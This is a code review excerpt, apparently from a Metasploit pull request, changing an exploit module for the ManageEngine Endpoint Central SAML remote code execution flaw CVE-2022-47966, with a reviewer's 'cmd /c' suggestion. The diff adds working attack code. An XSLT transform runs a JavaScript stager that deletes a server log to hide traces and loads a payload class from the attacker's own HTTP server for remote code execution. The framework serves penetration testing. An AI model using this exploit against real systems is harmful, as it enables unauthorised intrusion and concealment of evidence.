modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb

```diff
@@ -119,27 +128,87 @@ def encode_begin(real_payload, reqs)
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
+    when :java
+      # Start the HTTP server to serve the payload
+      start_service
+      # Trigger a loadClass request via java.net.URLClassLoader
+      trigger_urlclassloader
+      # Handle the payload
+      handler
     when :windows_command
       execute_command(payload.encoded)
     when :windows_dropper
       execute_cmdstager(delay: datastore['DELAY'])
     end
   end
 
+  def trigger_urlclassloader
+    # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
+    url = get_uri
+
+    vars = Rex::RandomIdentifier::Generator.new({ language: :java })
+
+    # stager for javascript engine
+    java_stager = <<~EOS
+      var #{vars[:file]} = Java.type(&quot;java.io.File&quot;);
+      new #{vars[:file]}(&quot;../logs/serverout0.txt&quot;).delete();
+      var #{vars[:str_arr]} = Java.type(&quot;java.lang.String[]&quot;);
+      var #{vars[:c]} = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
+      #{vars[:c]}.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[:str_arr]}(1)]);
+    EOS
+
+    transform = <<~EOT
+      <ds:Transforms>
+        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+            <xsl:stylesheet version="1.0"
+            xmlns:sem="http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager"
+            xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"
+            xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+                <xsl:variable name="#{vars[:engineobject]}" select="sem:new()"/>
+                <xsl:variable name="#{vars[:jsobject]}" select="sem:getEngineByName($#{vars[:engineobject]},'javascript')"/>
+                <xsl:variable name="#{vars[:out]}" select="se:eval($#{vars[:jsobject]},'#{java_stager}')"/>
+                <xsl:value-of select="$#{vars[:out]}"/>
+            </xsl:template>
+            </xsl:stylesheet>
+        </ds:Transform>
+      </ds:Transforms>
+    EOT
+    send_transform(transform)
+  end
+
   def execute_command(cmd, _opts = {})
     if target['Type'] == :windows_dropper
       cmd = "cmd /c #{cmd}"
     end
```

Comment:
I noticed that command-based payloads needed to be prefixed with `cmd /c`, not only the Windows dropper payloads. This fix was needed to make them work on my environment.
```suggestion
    cmd = "cmd /c #{cmd}"
```